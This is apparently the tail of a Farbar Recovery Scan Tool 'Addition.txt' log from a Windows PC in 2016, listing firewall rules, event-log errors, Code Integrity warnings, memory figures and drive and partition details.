FirewallRules: [{E5709ADD-BFFA-4A8C-A9B5-7E15E0582DC9}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe
FirewallRules: [{DF2B8723-CEC4-4121-B6DB-19FDA93A6270}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{BAB82F17-DE9D-4248-A0CB-8B5879ADB4D5}] => (Allow) C:\Program Fi
les (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{54ABF091-1DF9-4B69-B37B-C41E73C69CB6}] => (Allow) LPort=2869
FirewallRules: [{862B93C9-B9A9-48FA-ADA3-55F921FF41A4}] => (Allow) LPort=1900
FirewallRules: [{6F700F9F-D2C2-468C-B86E-5CA39E1D4741}] => (Allow) C:\Program Fi
les (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{5D10C7CA-B991-4391-B4D4-5C8BB7A03570}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe
FirewallRules: [{87A90989-487D-4828-AA46-7A469FF67E99}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe
FirewallRules: [{A33D9D2D-3F09-4532-BFCF-3F5E7EB512D8}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe
FirewallRules: [{AB39E013-B069-4E52-9BE2-E0FFDB0DFFEB}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe
FirewallRules: [{59651CC9-DAE1-45A7-B149-D8FC70DCE492}] => (Allow) C:\Program Fi
les (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FEC06A52-37E7-4021-ACBD-CD78C3D93BDB}C:\users\rev
erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata
\roaming\vseeinstall\vsee.exe
FirewallRules: [UDP Query User{45B734E6-71F3-4293-868A-6B2043316142}C:\users\rev
erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata
\roaming\vseeinstall\vsee.exe
FirewallRules: [{80B7C41D-AE8A-4702-8BB8-17C136318964}] => (Block) C:\users\reve
rien\appdata\roaming\vseeinstall\vsee.exe
FirewallRules: [{EDC8A610-4B6C-4F1E-BD72-B18609B14D31}] => (Block) C:\users\reve
rien\appdata\roaming\vseeinstall\vsee.exe
FirewallRules: [TCP Query User{9CE82D32-5C0E-4E17-8B6D-E4944A71551B}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [UDP Query User{E86DBDF3-5870-46CB-B2C1-7B01B124FD8B}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [TCP Query User{4064EA95-343A-4444-AA16-7E87ABDFCDA6}C:\program f
iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i
bm\spss\statistics\20\stats.exe
FirewallRules: [UDP Query User{47DFAE74-EBA1-4001-8308-3316B9D1FC26}C:\program f
iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i
bm\spss\statistics\20\stats.exe
FirewallRules: [TCP Query User{C0110B3C-2BCF-4E80-AEF4-74B2F19B9830}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [UDP Query User{7C67A3A5-4C70-435B-A43A-897049E4F23B}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [TCP Query User{1C739540-6B6E-4658-85DE-AE84B2115A96}C:\program f
iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60
\bin\java.exe
FirewallRules: [UDP Query User{625CADCA-9AD2-4D93-9946-9935A73F3C1A}C:\program f
iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60
\bin\java.exe
FirewallRules: [{9BE26317-4C02-4241-92DB-A8A1FC476E35}] => (Allow) C:\Program Fi
les\KMSnano\qemu-system-i386.exe
FirewallRules: [{0185FCB4-F83E-476C-8C83-7E96F997E750}] => (Allow) C:\Program Fi
les\KMSnano\qemu-system-i386.exe
FirewallRules: [{A94D9EED-B06D-40EF-BC22-696A748AA005}] => (Allow) c:\program fi
les (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [TCP Query User{C5F57E73-72B0-41B8-BC44-8684B97CC4DA}C:\program f
iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex
e
FirewallRules: [UDP Query User{739CCF3C-E344-4A02-9C2E-E15BE58C0F42}C:\program f
iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex
e
FirewallRules: [TCP Query User{23EA3972-718B-4DC8-8F47-383CBD730E9E}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
FirewallRules: [UDP Query User{F0C8441B-10DA-43D0-ADD9-E489B359C9CC}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
FirewallRules: [{F653B5D8-9AAC-4521-9B17-DFB7DC379077}] => (Allow) C:\Program Fi
les\Bonjour\mDNSResponder.exe
FirewallRules: [{88671DA2-CC5A-49CB-A0C9-48B72A220E78}] => (Allow) C:\Program Fi
les\Bonjour\mDNSResponder.exe
FirewallRules: [{91A5D443-9D77-4A0B-8E80-B5D3392DD370}] => (Allow) C:\Program Fi
les (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{87EF9B94-EE96-466E-BD82-8CE5117E7A10}] => (Allow) C:\Program Fi
les (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{70B2A856-2AF0-424D-8629-2DB1B396EC82}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
FirewallRules: [UDP Query User{10211271-2BDC-42C2-B961-8DB4582E4C2F}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
==================== Restore Points =========================
ATTENTION: System Restore is disabled
==================== Faulty Device Manager Devices =============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which
starts the Hardware Update wizard.
==================== Event log errors: =========================
Application errors:
==================
Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 788: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 776: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 776: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 1016: ERROR: read_msg errno 0 (The operation completed successfully
.)
Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 976: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
System errors:
=============
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The User Data Access_560cb16 service terminated unexpectedly. It ha
s done this 1 time(s). The following corrective action will be taken in 10000 mi
lliseconds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The User Data Storage_560cb16 service terminated unexpectedly. It h
as done this 1 time(s). The following corrective action will be taken in 10000 m
illiseconds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The Contact Data_560cb16 service terminated unexpectedly. It has do
ne this 1 time(s). The following corrective action will be taken in 10000 millis
econds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The Sync Host_560cb16 service terminated unexpectedly. It has done
this 1 time(s). The following corrective action will be taken in 10000 milliseco
nds: Restart the service.
Error: (04/06/2016 09:27:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR
ITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5
20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost
(Using LRPC)UnavailableUnavailable
Error: (04/05/2016 08:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR
ITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5
20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost
(Using LRPC)UnavailableUnavailable
Error: (04/05/2016 05:02:15 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR
ITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5
20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost
(Using LRPC)UnavailableUnavailable
Error: (04/05/2016 03:08:37 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the comp
uter ACER
that believes that it is the master browser for the domain on transport NetBT_Tc
pip_{D3A7E1A2-BF66-4FA4-B421-289C91B29B3B}.
The master browser is stopping or an election is being forced.
Error: (04/05/2016 02:40:17 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the comp
uter LENOVO
that believes that it is the master browser for the domain on transport NetBT_Tc
pip_{C7344E23-A6A5-4EEE-9867-288EC4D5B277}.
The master browser is stopping or an election is being forced.
Error: (04/05/2016 01:02:47 PM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The UpdateSvc service terminated unexpectedly. It has done this 2 t
ime(s). The following corrective action will be taken in 60000 milliseconds: Res
tart the service.
CodeIntegrity:
===================================
Date: 2016-04-06 09:07:15.285
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-06 09:07:15.243
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-04 14:22:01.468
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di
d not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-04 12:03:02.209
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-04 12:03:02.171
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-02 20:08:57.152
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di
d not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-30 14:43:23.764
Description: Code Integrity is unable to verify the image integrity of the fil
e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag
e image hashes could not be found on the system.
Date: 2016-03-30 14:29:38.240
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di
d not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-30 13:46:03.397
Description: Code Integrity is unable to verify the image integrity of the fil
e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag
e image hashes could not be found on the system.
Date: 2016-03-30 13:37:25.565
Description: Code Integrity is unable to verify the image integrity of the fil
e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag
e image hashes could not be found on the system.
==================== Memory info ===========================
Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz
Percentage of memory in use: 53%
Total physical RAM: 6027.22 MB
Available physical RAM: 2815.9 MB
Total Virtual: 8587.22 MB
Available Virtual: 4472.3 MB
==================== Drives ================================
Drive c: (TI31061100A) (Fixed) (Total:119.2 GB) (Free:20.51 GB) NTFS
Drive e: () (Fixed) (Total:166.29 GB) (Free:10.71 GB) NTFS
Drive h: () (Removable) (Total:7.44 GB) (Free:4.04 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000)
Partition: GPT.
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
